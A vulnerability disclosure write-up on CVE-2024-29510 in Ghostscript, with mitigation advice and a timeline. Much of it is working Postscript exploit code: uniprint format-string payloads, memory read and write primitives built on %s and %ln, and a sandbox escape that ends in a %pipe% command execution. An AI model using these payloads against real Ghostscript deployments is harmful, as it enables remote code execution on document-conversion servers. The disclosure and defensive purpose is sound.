Research Thomas Rinsma 07-02-2024

CVE-2024-29510 – Exploiting Ghostscript using format strings

TL;DR

This is a write-up for CVE-2024-29510, a format string vulnerability in Ghostscript ≤ 10.03.0 (but ≥ 9.50). We show how this can be exploited to bypass the -dSAFER sandbox and gain code execution.

This vulnerability has significant impact on web-applications and other services offering document conversion and preview functionalities as these often use Ghostscript under the hood. We recommend verifying whether your solution (indirectly) makes use of Ghostscript and if so, update it to the latest version.

This is part one of a three-part series on Ghostscript vulnerabilities found by Codean Labs.

Part two covers CVE-2024-29511, a partial sandbox escape leading to an arbitrary file read/write.
Part three covers CVE-2024-29506, CVE-2024-29507, CVE-2024-29508, and CVE-2024-29509, a set of memory-corruption-related vulnerabilities.

Introduction

Ghostscript, first released in 1988 (!), is a Postscript interpreter and a general document conversion toolkit. While originally being a relatively obscure UNIX tool used for talking to printers, it has nowadays found common usage in automated systems where it is used to process user-supplied files.

Specifically, many web applications which handle and convert images or documents will at some point call into Ghostscript. Often indirectly via tools like ImageMagick and LibreOffice. Think of the attachment preview images you see in chat programs and cloud storage applications; in the conversion and rendering logic behind those, there is often an invocation of Ghostscript!

The increase of these automated conversion workflows has pushed Ghostscript developers to implement various sandboxing functionalities and to harden them over time. In recent versions, the -dSAFER sandbox is enabled by default, and blocks or limits all kinds of dangerous operations such as file I/O and command execution which would normally be possible in Postscript.

From a security perspective this is of course very interesting. We have a wide attack surface (user-supplied input files and lots of functionality to explore) and a clear goal (escaping the sandbox, leading to Remote Code Execution (RCE)).

It is good to remember that Postscript is a well-featured Turing-complete programming language. A bit like TeX, but arguably more general-purpose. Its support for file I/O for example enables one to write document-related conversion and extraction tools in Postscript. From that point-of-view, the ability to execute commands using a pipe (by prefixing a file-open path with | or %pipe%) is just as normal as it is in Perl or Bash.

All of this puts Ghostscript in an odd place where it wants to allow all these legacy use-cases, but it is also commonly being used as a conversion tool on untrusted files, which are often treated more as static graphic descriptions rather than as programs.

Playing in the sandbox

The -dSAFER sandbox mainly revolves around restricting I/O operations. When enabled, it disallows the %pipe% functionality that would otherwise allow for command execution (e.g., by opening the file %pipe%uname -a), and it restricts file access to a whitelisted set of paths. In a default install, this list includes some Ghostscript-internal paths for things like fonts, and the /tmp/ directory (at least on Linux).

Postscript is a stack-based language, which makes it a bit hard to read if you’re not used to it. The code of a Postscript program is in essense a big list of things which are pushed one-by-one on the execution stack. When an operator is encountered, one or more elements of this stack may be consumed, and one or more new ones may be pushed. This is analogous to calculators with reverse-Polish-notation, for example:


3 4 add =       % prints "7"
3 4 mul 2 add = % prints "14"

More complicated logic requires some stack “juggling”: operators like pop, dup and exch copy and move things around on the stack.

Postscript has standard types like booleans and numbers, but also strings ((foobar)) (note the parentheses as opposed to quotes), lists ([ 1 2 3 ]), dicts (<< /Key (value) /Foo (bar) /Baz 42 >>) and procedures ({ (Hello world!) = }). Those slash-prefixed dictionary keys are names. They can also be defined on the global scope (that’s also a dictionary!) using def. You can then dereference them without the slash:


/MyVariable (Hello world!) def
MyVariable = % prints "Hello world!"

Names can also refer to procedures. In this article we’ll mostly use CamelCase for variables and snake_case for user-defined procedures.

The fact that /tmp/ is fully accessible is quite interesting, as it means that even in a sandboxed environment, a Postscript program can list, read and write anything under /tmp/:


% List all files under /tmp/
(/tmp/*) { = } 1024 string filenameforall

% Read and print contents of /tmp/foobar
(/tmp/foobar) (r) file 1024 string readstring pop =

% Write to a (new) file
(/tmp/newfile) (w) file dup (Hello world!) writestring closefile

In certain integrated usages of Ghostscript this could already be dangerous, as temporary sensitive data or configurations could be stored in /tmp/. Or other people’s uploaded content could be present there.

The ability to read and write files becomes even more interesting from an attacker’s perspective when combined with the ability to change the output device and its settings. The non-sandboxed setpagedevice operator receives a dictionary with device parameters, including the device name itself. These are equivalent to the fields you’d often specify on the command-line, including the output filepath. It’s therefore possible to render a page with an arbitrary device and read back the generated output file, all from within the same execution, independent of the originally set device parameters.


% simple_stroke.ps

% Change the current output file and page device (e.g., pdfwrite)
<<
	/OutputFile (/tmp/foobar)
	/OutputDevice /pdfwrite
>> 
setpagedevice

% Some minimal graphical content (a single diagonal stroke)
newpath
100 600 moveto
200 400 lineto
5 setlinewidth
stroke

% Produce a page
showpage

% Read back the contents of the output file
(/tmp/foobar) (r) file 8000 string readstring pop
print

After showpage is invoked, the device has written out the data corresponding to the content of the page. Hence, we can immediately read this back, in this case printing it to stdout using print:


$ ghostscript -q -dSAFER -dBATCH -dNODISPLAY simple_stroke.ps
%PDF-1.7
%
%%Invocation: ghostscript -q -dSAFER -dBATCH -dNODISPLAY ?
5 0 obj
<</Length 6 0 R/Filter /FlateDecode>>
stream
x+T03T0A(˥d^ejPeeeh```"r@

e

The partial binary PDF stream at the end encodes the line we’ve drawn. If we let the program finish, Ghostscript will close the page device which nicely wraps up the output file /tmp/foobar, in this case a valid PDF with an xref table and everything:

The file “foobar.pdf” as rendered by a PDF reader.

Too universal

Ghostscript implements dozens of different output devices, as listed in its --help output. A device is just some logic that produces output data. This ranges from x11alpha which shows a window (on Linux) to e.g. jpegcmyk which produces a JPEG file. Similarly, several document types are supported (e.g., XPS, EPS, PDF), but also many variants of printer command languages (e.g., PJL, PCL, epson, deskjet). Devices can be configured and selected (usually with -sDEVICE= on the command-line, but also via setpagedevice from within Postscript as we saw before). Configurable parameters vary by device, but standard ones include the output file, the page format, margins, color profiles, etc.

Ghostscript is very configurable via the command-line. With the -d and -s prefixes it is possible to set booleans and named fields which are used by the startup logic to configure the device. Some common usecases include:


# Read a file from stdin, and output it as PNG to stdout
# (e.g., how LibreOffice invokes Ghostscript to render embedded EPS files)
ghostscript -q -dBATCH -dNOPAUSE -sDEVICE=pngalpha -sOutputFile=- -

# Extract pages 3-5 from in.pdf into out.pdf
ghostscript -dNOPAUSE -dQUIET -dBATCH -sOutputFile=out.pdf -dFirstPage=3 -dLastPage=5 -sDEVICE=pdfwrite in.pdf

# Determine the bounding box of an EPS file
ghostscript -q -dBATCH -dNOPAUSE -sDEVICE=bbox -sOutputFile=- img.eps

One interesting device is uniprint, the “universal printer device”. It is particularly versatile as it can be used to generate command data for different brands and models of printers, just by changing the device’s configuration parameters. Ghostscript ships with a set of .upp files which are just Ghostscript command-lines (notice -dSAFER and -sDEVICE=uniprint for example) with pre-filled parameters for specific printers, e.g. cdj550.upp:


-supModel="HP Deskjet 550c, 300x300DpI, Gamma=2"
-sDEVICE=uniprint
-dNOPAUSE
-P- -dSAFER
-dupColorModel=/DeviceCMYK
-dupRendering=/ErrorDiffusion
-dupOutputFormat=/Pcl
-r300x300
-dupMargins="{ 12.0 36.0 12.0 12.0}"
-dupBlackTransfer="{
     0.0000 0.0010 0.0042 0.0094 0.0166 0.0260 0.0375 0.0510 
     0.0666 0.0843 0.1041 0.1259 0.1498 0.1758 0.2039 0.2341
     0.2663 0.3007 0.3371 0.3756 0.4162 0.4589 0.5036 0.5505
     0.5994 0.6504 0.7034 0.7586 0.8158 0.8751 0.9365 1.0000
}"
-dupCyanTransfer="{
     0.0000 0.0010 0.0042 0.0094 0.0166 0.0260 0.0375 0.0510 
     0.0666 0.0843 0.1041 0.1259 0.1498 0.1758 0.2039 0.2341
     0.2663 0.3007 0.3371 0.3756 0.4162 0.4589 0.5036 0.5505
     0.5994 0.6504 0.7034 0.7586 0.8158 0.8751 0.9365 1.0000
}"
-dupMagentaTransfer="{
     0.0000 0.0010 0.0042 0.0094 0.0166 0.0260 0.0375 0.0510 
     0.0666 0.0843 0.1041 0.1259 0.1498 0.1758 0.2039 0.2341
     0.2663 0.3007 0.3371 0.3756 0.4162 0.4589 0.5036 0.5505
     0.5994 0.6504 0.7034 0.7586 0.8158 0.8751 0.9365 1.0000
}"
-dupYellowTransfer="{
     0.0000 0.0010 0.0042 0.0094 0.0166 0.0260 0.0375 0.0510 
     0.0666 0.0843 0.1041 0.1259 0.1498 0.1758 0.2039 0.2341
     0.2663 0.3007 0.3371 0.3756 0.4162 0.4589 0.5036 0.5505
     0.5994 0.6504 0.7034 0.7586 0.8158 0.8751 0.9365 1.0000
}"
-dupBeginPageCommand="<
   1b2a726243
   1b2a7433303052
   1b266c33616f6c45
   1b2a6f31643251
   1b2a703059
   1b2a72732d34753041
   1b2a62326d
>"
-dupAdjustPageWidthCommand
-dupEndPageCommand="(0M\033*rbC\033E\033&l0H)"
-dupAbortCommand="(0M\033*rbC\033E\15\12\12\12\12    Printout-Aborted\15\033&l0H)"
-dupYMoveCommand="(%dy\0)"
-dupWriteComponentCommands="{ (%dv\0) (%dv\0) (%dv\0) (%dw\0) }"

If you look carefully at the last couple of parameters, you’ll notice that upYMoveCommand and upWriteComponentCommands contain format-string specifiers. Specifically, %d is used to incorporate an integer parameter at a chosen position. Presumably this is needed for versatility across the different printer dialects.

Looking at the codebase confirms that these parameters are indeed used as format strings as-is, but only in case of the \Pcl output format (uniprint supports several types of output formats). In case of upOutputFormat == \Pcl, the function upd_wrtrtl is used for rendering. Inside that function, the contents of upYMoveCommand (copied to upd->strings[S_YMOVE] during device initialization) is used as a format string for the function gs_snprintf, with a calculated “Y position” being passed as a variadic argument:


      /*
       *    Adjust the Printers Y-Position
       */
      if(upd->yscan != upd->yprinter) { /* Adjust Y-Position */
         if(1 < upd->strings[S_YMOVE].size) {
           gs_snprintf((char *)upd->outbuf+ioutbuf, upd->noutbuf-ioutbuf,
             (const char *) upd->strings[S_YMOVE].data,
             upd->yscan - upd->yprinter);
           ioutbuf += strlen((char *)upd->outbuf+ioutbuf);
         } else {
		       <snip>
	       }
       }

If you’re familiar with format string exploits you’ll now what comes next!

A proof of concept

As these parameters are just regular device parameters, we can use setpagedevice to change the device to uniprint, just like we did with pdfwrite before. It is then simple to pass arbitrary values for the various upXXXX parameters, just by setting them in the dictionary passed to setpagedevice.

As for the two parameters with format strings, it appears that upYMoveCommand is nicest to play with as it is just a single string which is formatted only once if you render a simple page. It looks like this command is used to tell a printer to move the print head to a specific Y position before printing whatever follows. But for this attack it doesn’t really matter what the intended purpose is.

So, let’s try with a simple proof of concept. We take our previous PDF example where we write to /tmp/foobar and read it back, but replace the setpagedevice invocation with the following:


% Change the page device to `uniprint`, setting its output file and other params
<<
	/OutputFile (/tmp/foobar)
	/OutputDevice /uniprint

	% Required uniprint parameters to reach the `upd_wrtrtl(...)` variant
	/upColorModel /DeviceCMYKgenerate
	/upRendering /FSCMYK32
	/upOutputFormat /Pcl
	
	% Set our testing payload
	/upYMoveCommand (1:%x\n2:%x\n3:%x\n4:%x\n5:%x\n6:%x\n7:%x\n8:%x\n)

	% Set some of the other string parameters
	/upBeginJobCommand (Hello job!\n)
	/upBeginPageCommand (Hello page!\n)

	% empty strings to reduce spam
	/upWriteComponentCommands {(\0) (\0) (\0) (\0)} 
>> 
setpagedevice

This gives us a string like this from the output (which was read back from /tmp/foobar):


Hello job!
Hello page!
1:be
2:be
3:5fd58000
4:5fd580f0
5:5fc36460
6:fffffff0
7:e48f1300
8:60005718
A?????????????????????????

In between other uniprint output (most of which is actually non-ascii data representing the stroke we drew) we find our formatted string, including the values of the first 8 words on the stack! Basically, the implementation of gs_snprintf blindly reads a “parameter” from the stack for every given format specifier, assuming these were passed as variadic arguments. But because in this case these parameters were not actually supplied (only one integer is given), it reads from locations further down the stack.

Using this technique, we can read the contents of the stack at arbitrary offsets from the current stack pointer, all the way down to the contents of argv and envp (pushed before main is called). This by itself is already useful, as it leaks environment variables and various pointers that could be useful for bypassing ASLR in other exploits. On systems where it is enabled, this also leaks the stack cookie value which can be useful for exploiting stack buffer overflows.

However, we can do more than just print stack values. If we can somehow control a pointer somewhere on the stack, we can use %s to dereference it. While %s stops reading at null-bytes, this is not a problem: if we know we want to read N bytes, we can use %.Ns (e.g., %.8s). If we then get back less than N characters (say M), then we know that a null-byte must have followed and we recurse by reading (N – M – 1) bytes from (address + M + 1), until all bytes are read. With N=8, this technique can be used to extract a full pointer stored at a specified address, even if it happens to contain a null-byte.

Similarly — and this is usually the crux of format string attacks — if we can control a value on the stack, we can instead use %n to write to it. This is a relatively obscure and unique specifier which writes the number of characters printed up to that point, to a given pointer argument. A simple example with printf:


int n;
printf("Hello%n world!", &n);
// n == 5;

In our scenario there are limitations on the length of the format string, hence we can’t write arbitrarily high values with this (we would need to supply a very long string for high values). We can however use %hn to write an arbitrary 2-byte short to a memory address on the stack, just by putting up to 2^16 bytes of padding data in the format string.

Fun fact: gs_snprintf invokes apr_vformatter, which is a custom printf-style formatter that ships with Ghostscript. This means that the libc-provided formatter (regular snprintf) is not used in this case, which is beneficial for our attack as that one is often compiled with countermeasures against format string attacks!

Arbitrary read/write?

So we can read from and write to pointers that happen to be on the stack, but what about an arbitrary read/write? In textbook format string attacks the format string itself is often located on the stack, providing an easy to control buffer to put an address in:


/* fmt.c */
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char fmt[256];
    strncpy(fmt, argv[1], sizeof(fmt));
    printf(fmt);
}


$ ./fmt 'AAAAAAAA_%lx,%lx,%lx,%lx,%lx,%lx,%lx,%lx,%lx'
AAAAAAAA_7fff98ccd540,7fff98ccca50,d,0,7c7a77bd2180,7fff98cccbf8,20,4141414141414141,786c252c786c255f

Notice the literal 4141414141414141 on the stack, coming from the start of the format string ("AAAAAAAA"). By replacing the corresponding %lx with %n the program will try to write a value to that address:


$ valgrind ./fmt 'AAAAAAAA_%lx,%lx,%lx,%lx,%lx,%lx,%lx,%n,%lx'
...
==671567== Invalid write of size 4
==671567==    at 0x48E2BA1: __printf_buffer (vfprintf-process-arg.c:348)
==671567==    by 0x48E36E0: __vfprintf_internal (vfprintf-internal.c:1523)
==671567==    by 0x48D886E: printf (printf.c:33)
==671567==    by 0x1091EC: main (in fmt)
==671567==  Address 0x4141414141414141 is not stack'd, malloc'd or (recently) free'd
...

In our case it is sadly not this simple. Our format string is located on the heap, hence we need to find a different value on the stack which we have full control over.

What values does the stack consist of? Well, it always contains the parameters and local variables of each function in the call-stack. Here is the call-stack at the invocation of gs_snprintf:


#0   upd_wrtrtl (upd=0x55555829c610, out=0x55555827fe50) at ./devices/gdevupd.c:6992
#1   upd_print_page (pdev=0x555558550068, out=0x55555827fe50) at ./devices/gdevupd.c:1161
#2   gx_default_print_page_copies (pdev=0x555558550068, prn_stream=0x55555827fe50, num_copies=0x1) at ./base/gdevprn.c:1160
#3   gdev_prn_output_page_aux (pdev=0x555558550068, num_copies=0x1, flush=0x1, seekable=0x0, bg_print_ok=0x0) at ./base/gdevprn.c:1062
#4   gdev_prn_output_page (pdev=0x555558550068, num_copies=0x1, flush=0x1) at ./base/gdevprn.c:1098
#5   default_subclass_output_page (dev=0x5555583c42e8, num_copies=0x1, flush=0x1) at ./base/gdevsclass.c:136
#6   gs_output_page (pgs=0x555558198490, num_copies=0x1, flush=0x1) at ./base/gsdevice.c:207
#7   zoutputpage (i_ctx_p=0x5555581981a8) at ./psi/zdevice.c:502
#8   do_call_operator (op_proc=0x55555646e9e8 <zoutputpage>, i_ctx_p=0x5555581981a8) at ./psi/interp.c:91
#9   interp (pi_ctx_p=0x555558164a50, pref=0x7fffffffd170, perror_object=0x7fffffffd4e0) at ./psi/interp.c:1375
#10  gs_call_interp (pi_ctx_p=0x555558164a50, pref=0x7fffffffd3e0, user_errors=0x1, pexit_code=0x7fffffffd4d8, perror_object=0x7fffffffd4e0) at ./psi/interp.c:531
#11  gs_interpret (pi_ctx_p=0x555558164a50, pref=0x7fffffffd3e0, user_errors=0x1, pexit_code=0x7fffffffd4d8, perror_object=0x7fffffffd4e0) at ./psi/interp.c:488
#12  gs_main_interpret (minst=0x5555581649b0, pref=0x7fffffffd3e0, user_errors=0x1, pexit_code=0x7fffffffd4d8, perror_object=0x7fffffffd4e0) at ./psi/imain.c:257
#13  gs_main_run_string_end (minst=0x5555581649b0, user_errors=0x1, pexit_code=0x7fffffffd4d8, perror_object=0x7fffffffd4e0) at ./psi/imain.c:945
#14  gs_main_run_string_with_length (minst=0x5555581649b0, str=0x555558273390 "<707472732e7073>.runfile", length=0x18, user_errors=0x1, pexit_code=0x7fffffffd4d8, perror_object=0x7fffffffd4e0) at ./psi/imain.c:889
#15  gs_main_run_string (minst=0x5555581649b0, str=0x555558273390 "<707472732e7073>.runfile", user_errors=0x1, pexit_code=0x7fffffffd4d8, perror_object=0x7fffffffd4e0) at ./psi/imain.c:870
#16  run_string (minst=0x5555581649b0, str=0x555558273390 "<707472732e7073>.runfile", options=0x3, user_errors=0x1, pexit_code=0x7fffffffd4d8, perror_object=0x7fffffffd4e0) at ./psi/imainarg.c:1169
#17  runarg (minst=0x5555581649b0, pre=0x555557000263 "", arg=0x7fffffffd658 "ptrs.ps", post=0x555557000914 ".runfile", options=0x3, user_errors=0x1, pexit_code=0x0, perror_object=0x0) at ./psi/imainarg.c:1128
#18  argproc (minst=0x5555581649b0, arg=0x7fffffffd658 "ptrs.ps") at ./psi/imainarg.c:1050
#19  gs_main_init_with_args01 (minst=0x5555581649b0, argc=0x4, argv=0x7fffffffe228) at ./psi/imainarg.c:242
#20  gs_main_init_with_args (minst=0x5555581649b0, argc=0x4, argv=0x7fffffffe228) at ./psi/imainarg.c:289
#21  psapi_init_with_args (ctx=0x555558164180, argc=0x4, argv=0x7fffffffe228) at ./psi/psapi.c:281
#22  gsapi_init_with_args (instance=0x555558164180, argc=0x4, argv=0x7fffffffe228) at ./psi/iapi.c:253
#23  main (argc=0x4, argv=0x7fffffffe228) at ./psi/gs.c:95

As you can see, most of the parameter values in this call-stack are pointers, and the few non-pointer values in there are not easily or fully controllable from within Postscript. Sadly, it seems that the same applies for these functions’ local variables: none of them gives us 8 easily controllable sequential bytes.

A ghostly stack buffer

Luckily, we are not actually limited to the functions of the current call-stack. The stack’s address space is a living region which constantly gets overwritten as the stack grows, shrinks, and grows again. Some function parameters or locals may be uninitialized buffers or padded structs, meaning that they leave previous stack contents in place. Hence, we’re also looking for locals and parameters of functions that at some point happened to be in our accessible region of the stack and have not been overwritten since.

One such variable is the sstate variable in gs_scan_token(...). This function is invoked as part of the Ghostscript interpreter loop, seemingly when a new token needs to be processed (Postscript is an interpreted language). When this function encounters a percent-sign, it goes into some logic which saves the comment text that follows, just in case it turns out to be a special comment which needs to be processed further.

Special comments are those that start with %% or %!. These are for example used in EPS file headers to convey metadata:


%!PS-Adobe-3.0 EPSF-3.0
%%Document-Fonts: Times-Roman
%%Title: hello.eps
%%Creator: Someone
%%CreationDate: 01-Jan-70
%%Pages: 1
%%BoundingBox:   36   36  576  756
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog
...

Notably, when the comment is the final token in the input stream, the full comment string is memcpy‘d into sstate.s_da.buf, which is a stack-allocated buffer:


      case '%':
      {                   /* Scan as much as possible within the buffer. */
          const byte *base = sptr;
          const byte *end;

          while (++sptr < endptr)         /* stop 1 char early */
              switch (*sptr) {
                  case char_CR:
                      end = sptr;
                      if (sptr[1] == char_EOL)
                          sptr++;
                    cend: /* Check for externally processed comments. */
                      retcode = scan_comment(i_ctx_p, myref, &sstate,
                                             base, end, false);
                      if (retcode != 0)
                          goto comment;
                      goto top;
                  case char_EOL:
                  case '\f':
                      end = sptr;
                      goto cend;
              }
          /*
           * We got to the end of the buffer while inside a comment.
           * If there is a possibility that we must pass the comment
           * to an external procedure, move what we have collected
           * so far into a private buffer now.
           */
          --sptr;
          sstate.s_da.buf[1] = 0;
          {
              /* Could be an externally processable comment. */
              uint len = sptr + 1 - base;
              if (len > sizeof(sstate.s_da.buf))
                  len = sizeof(sstate.s_da.buf);

              memcpy(sstate.s_da.buf, base, len);
              daptr = sstate.s_da.buf + len;
          }
          sstate.s_da.base = sstate.s_da.buf;
          sstate.s_da.is_dynamic = false;
      }

It just happens to be the case that this buffer is not overwritten, and we can see it from our format string if showpage is called right after a special comment. In order for the comment to be the final token in the interpreter’s buffer, we need to invoke the interpreter recursively. This can be done in various ways, but the simplest way is through Ghostscript’s .runstring operator. Think of it like Javascript’s eval.

To demonstrate, we take the example from before, but print many more (about 300) 8-byte words from the stack using %lx (trimmed):


...
/upYMoveCommand (1:%lx\n2:%lx\n3:%lx\n ... 298:%lx\n299:%lx\n300:%lx\n)
...

And we insert the following just before showpage:


(%%XXAAAAAAAA) .runstring

Now, the resulting output looks as follows (trimmed):


...
222:7ffe2ee85dcc
223:7ffe2ee85dcc
224:7ffe2ee85dcc
225:5858252500000000
226:4141414141414141
227:0
228:0
229:0
230:7ffe2ee85e30
231:62bea58b57b0
...

It seems that sstate.s_da.buf roughly spans stack indices 225 – 229. The structure’s offsets are such that the start of our comment ("%%XX") is stored in the word at 225, whereas the word at 226 is the first one we have full control over ("AAAAAAAA"). Hence, we can generalize our code a bit to build a simple primitive that puts an 8-byte string as a single word on the stack (the real stack, not the Postscript stack!):


/StackString (AAAAAAAA) def % this can be determined at runtime
(%%XX) StackString cat .runstring

Putting things together

Now we can put an arbitrary 8-byte value at a known location on the stack, meaning that we can finally properly use %s and %n to their full potential, giving us memory read and write primitives!

Let’s abstract away the uniprint format-string invocations and file read into a Postscript procedure called do_uniprint:


% <StackString> <FmtString> do_uniprint <LeakedData>
/do_uniprint {
	/FmtString exch def   % the format string payload to use
	/StackString exch def % which 8-byte string to put on the stack beforehand

	% Select uniprint device with our payload
	<<
		/OutputFile PathTempFile
		/OutputDevice /uniprint
		/upColorModel /DeviceCMYKgenerate
		/upRendering /FSCMYK32
		/upOutputFormat /Pcl
		/upOutputWidth 99999 % This gives a bigger buffer for our format string
		/upWriteComponentCommands {(x)(x)(x)(x)} % This is required, just put bogus strings
		/upYMoveCommand FmtString
	>>
	setpagedevice
	
	% Manipulate the interpreter to put controlled data on the stack
	(%%XX) StackString cat .runstring

	% Produce a page with some content to trigger format string logic
	newpath 1 1 moveto 1 2 lineto 1 setlinewidth stroke
	showpage

	% Read back the written data
	/InFile PathTempFile (r) file def
	/LeakedData InFile 4096 string readstring pop def
	InFile closefile

	LeakedData % return
} bind def

This then allows us to write the higher level procedures write_to, read_ptr_at, read_dereferenced_bytes_at, read_dereferenced_ptr_at:


% <StackIdx> <AddrHex> write_to
/write_to {
	/AddrHex exch str_ptr_to_le_bytes def % address to write to
	/StackIdx exch def % stack idx to use

	/FmtString StackIdx 1 sub (%x) times (_%ln) cat def

	AddrHex FmtString do_uniprint

	pop % we don't care about formatted data
} bind def

% <StackIdx> read_ptr_at <PtrHexStr>
/read_ptr_at {
	/StackIdx exch def % stack idx to use

	/FmtString StackIdx 1 sub (%x) times (__%lx__) cat def

	() FmtString do_uniprint

	(__) search pop pop pop (__) search pop exch pop exch pop
} bind def

% num_bytes <= 9
% <StackIdx> <PtrHex> <NumBytes> read_dereferenced_bytes_at <ResultAsMultipliedInt>
/read_dereferenced_bytes_at {
	/NumBytes exch def
	/PtrHex exch def
	/PtrOct PtrHex str_ptr_to_le_bytes def % address to read from
	/StackIdx exch def % stack idx to use

	/FmtString StackIdx 1 sub (%x) times (__%.) NumBytes 1 string cvs cat (s__) cat cat def

	PtrOct FmtString do_uniprint

	/Data exch (__) search pop pop pop (__) search pop exch pop exch pop def

	% Check if we were able to read all bytes
	Data length NumBytes eq {
		% Yes we did! So return the integer conversion of the bytes
		0 % accumulator
		NumBytes 1 sub -1 0 {
			exch % <i> <accum>
			256 mul exch % <accum*256> <i>
			Data exch get % <accum*256> <Data[i]>
			add % <accum*256 + Data[i]>
		} for
	} {
		% We did not read all bytes, add a null byte and recurse on addr+1
		StackIdx 1 PtrHex ptr_add_offset NumBytes 1 sub read_dereferenced_bytes_at
		256 mul
	} ifelse
} bind def

% <StackIdx> <AddrHex> read_dereferenced_ptr_at <PtrHexStr>
/read_dereferenced_ptr_at {
	% Read 6 bytes
	6 read_dereferenced_bytes_at

	% Convert to hex string and return
	16 12 string cvrs
} bind def

Exploitation

Our final exploitation goal is to escape the -dSAFER sandbox, as this would give us full RCE on the machine running Ghostscript. When -dSAFER is enabled, Ghostscript permanently sets a boolean field (path_control_active) in a global context structure to 1. From within Postscript it is normally not possible to change this value back after it’s been set to 1.

However, if we can literally poke into memory at the right location and set this field to 0, all -dSAFER limitations would be gone instantly, for as long as the Ghostscript process runs.

So, we’d need to find the address of path_control_active (due to ASLR, this changes every time). This field is part of the gs_lib_ctx_core_t structure, a global instance of which is allocated on the heap, but we don’t know where exactly because it’s not referred to anywhere on the stack.

Instead, we can use the fact that a pointer to the gs_lib_ctx_core_t structure is part of gs_lib_ctx_t, which is part of gs_memory_t. And as it happens, the function containing the gs_snprintf invocation, upd_wrtrtl(upd_p upd, gp_file *out), receives a gp_file * parameter out which has a pointer to gs_memory_t. In other words, we just need to grab out from its consistent stack location and then dereference it a bunch of times to get &out->memory->gs_lib_ctx->core->path_control_active.

Because none of these fields are at offset 0 in their parent structs, we need to be able to add an offset to a leaked (hex) pointer value, before dereferencing it again. Luckily Postscript is quite flexible in terms of dealing with base-16 numbers, so the following does the trick:


% <Offset> <PtrHexStr> ptr_add_offset <PtrHexStr>
/ptr_add_offset {
	/PtrHexStr exch def % hex string pointer
	/Offset exch def % integer to add

	/PtrNum (16#) PtrHexStr cat cvi def

	% base 16, string length 12
	PtrNum Offset add 16 12 string cvrs
} bind def

The result is a hex string, but to get this value onto the stack (remember, using the %%BB........ comment) it needs to be a string of raw bytes, and reversed (on little-endian systems at least). Hence, we write another helper function:


% Convert hex string "4142DEADBEEF" to padded little-endian byte string "\xEF\xBE\xAD\xDE\x42\x41\x00\x00"
% <HexStr> str_ptr_to_le_bytes <ByteStringLE>
/str_ptr_to_le_bytes {
	% Convert hex string argument to Postscript string
	% using <DEADBEEF> notation
	/ArgBytes exch (<) exch (>) cat cat token pop exch pop def

	% Prepare resulting string (`string` fills with zeros)
	/Res 8 string def

	% For every byte in the input
	0 1 ArgBytes length 1 sub {
		/i exch def

		% put byte at index (len(ArgBytes) - 1 - i)
		Res ArgBytes length 1 sub i sub ArgBytes i get put
	} for

	Res % return
} bind def

Don’t worry if this is confusing, it’s just piping to automate the exploit. With all these primitives in place, we can obtain the address of Ghostscript’s path_control_active using a chain of read_dereferenced_ptr_at and ptr_add_offset:


% Use primitives to obtain: &out->memory->gs_lib_ctx->core->path_control_active

/IdxOutPtr 5 def  % Position of `gp_file *out` on the stack
/PtrOut IdxOutPtr read_ptr_at def

% `memory` is at offset 144 in `out`
/PtrOutOffset 144 PtrOut ptr_add_offset def
/PtrMem IdxStackControllable PtrOutOffset read_dereferenced_ptr_at def

% `gs_lib_ctx` is at offset 208 in `memory`
/PtrMemOffset 208 PtrMem ptr_add_offset def
/PtrGsLibCtx IdxStackControllable PtrMemOffset read_dereferenced_ptr_at def

% `core` is at offset 8 in `gs_lib_ctx`
/PtrGsLibCtxOffset 8 PtrGsLibCtx ptr_add_offset def
/PtrCore IdxStackControllable PtrGsLibCtxOffset read_dereferenced_ptr_at def

% `path_control_active` is at offset 156 in `core`
/PtrPathControlActive 156 PtrCore ptr_add_offset def

Now we have the address of path_control_active. The only remaining step is to overwrite it with 0. Using variants of %n it is not possible to write such a low value directly, but we can easily overcome that by instead writing to &path_control_active - 3 instead, which on little-endian platforms will overwrite the least-significant byte of the actual field with the most-significant byte of whichever (small) integer we’re writing, hence setting it to zero. We do partially corrupt another value in the struct but it does not seem important. Immediately afterwards the sandbox will be disabled, allowing for the execution of shell commands through %pipe%:


% Subtract a bit from the address to make sure we write a null over the field
/PtrTarget -3 PtrPathControlActive ptr_add_offset def

% And overwrite it!
IdxStackControllable PtrTarget write_to

% And now path_control_active == 0, so we can use %pipe% as if -dSAFER was never set :)

(%pipe%gnome-calculator) (r) file

Download the full exploit for Linux (x86-64) here. Of course you can change the command at the end (gnome-calculator) to your liking.

The exploit code is also a valid EPS file, hence it can be uploaded to image conversion services that accept EPS and invoke Ghostscript. Alternatively we can embed it in a LibreOffice document file, triggering the command execution when the file is opened, either on a server via the headless libreoffice-convert, or on a desktop:

Mitigation

At Codean Labs we realize it is difficult to keep track of dependencies like this and their associated risks. It is our pleasure to take this burden from you. We perform application security assessments in an efficient, thorough and human manner, allowing you to focus on development. Click here to learn more.

The best mitigation against this vulnerability is to update your installation of Ghostscript to v10.03.1. If your distribution does not provide the latest Ghostscript version, it might still have released a patch version containing a fix for this vulnerability (e.g., Debian, Ubuntu, Fedora). It might also be the case that your distribution provides a version so old (< v9.50) that it is not vulnerable to this CVE either.

If you’re unsure if you’re affected, we provide a testkit: a small Postscript file which will tell you if your version of Ghostscript is affected. Download it here, and run it like this:


ghostscript -q -dNODISPLAY -dBATCH -dSAFER CVE-2024-29510_testkit.ps

Timeline

2024-03-14: reported to the Artifex Ghostscript issue tracker
2024-03-24: CVE-2024-29510 assigned by Mitre
2024-03-28: issue acknowledged by the developers
2024-05-02: Ghostscript 10.03.1 released which mitigates the issue
2024-07-02: publication of this blogpost

You’ve seen what we do. Let’s talk about what we can do for you.

Schedule a 30-minute call